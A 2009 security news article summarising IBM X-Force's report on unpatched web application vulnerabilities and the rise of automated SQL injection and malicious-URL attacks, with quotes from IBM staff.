February 03, 2009

IBM: Unpatched applications threaten users

Many corporations use off-the-shelf applications riddled with non-patched vulnerabilities or custom web applications that host unpatched vulnerabilities, according to a new research report from IBM ISS.

In fact, during 2008, of all vulnerabilities related to web applications, 74 percent had no patches available for them, according to the annual X-Force Trend and Risk Report, released Monday. The study also found that attackers have turned their focus to new types of exploits, such as malicious links to Adobe Flash and PDF documents.

Moreover, during the fourth quarter of 2008 alone, IBM traced a 50 percent increase in the number of malicious URLs hosting exploits – more than found in all of 2007, according to the report. Thus, large scale and automated SQL injection vulnerabilities that emerged early last year have continued unabated. By the end of 2008, the volume of attacks jumped to 30 times the number of attacks initially seen last summer.

“Attackers are building SQL injection code into automated tools that scan for vulnerable websites, putting in redirects to malicious servers, or trying to incorporate malware into corporate web sites," said Holly Stewart, X-Force threat response manager for IBM Internet Security Systems.

IBM claims that 50 percent of all vulnerabilities discovered during the past three years have no patch available for them today. That translates into a lot of vulnerable web sites.

"The purpose of these automated attacks is to deceive and redirect web surfers to web browser exploit toolkits," said Kris Lamb, senior operations manager, X-Force Research and Development for IBM ISS. "It is staggering that we still see SQL injection attacks in widespread use without adequate patching almost 10 years after they were first disclosed.”

For the report, IBM looked back at application vulnerabilities disclosed in the past three years, and checked to see whether vendors fixed them. In other words, the number of vulnerabilities was compared to the number of patches made available by vendors to fix problems.

“A vendor does not always release a patch when a vulnerability is disclosed by independent researchers around the world," Stewart said. "So even if users wanted to fix the software, vendors have not always provided a way for it to be done.”

Related Articles
Related Topics
Related Links
close

Next Article in News

Sign up to our newsletters

More in News

Bitcoin mining botnet has become one of the most prevalent cyber threats

Fortinet researchers have tracked 100,000 new ZeroAccess trojan infections per week, making the botnet very lucrative to its owners.

House Intelligence Committee OKs amended version of controversial CISPA

House Intelligence Committee OKs amended version of controversial ...

Despite the 18-to-2 vote in favor of the bill proposal, privacy advocates likely will not be satisfied, considering two key amendments reportedly were shot down.

Judge rules hospital can ask ISP for help in ID'ing alleged hackers

Judge rules hospital can ask ISP for help ...

The case stems from two incidents where at least one individual is accused of accessing the hospital's network to spread "defamatory" messages to employees.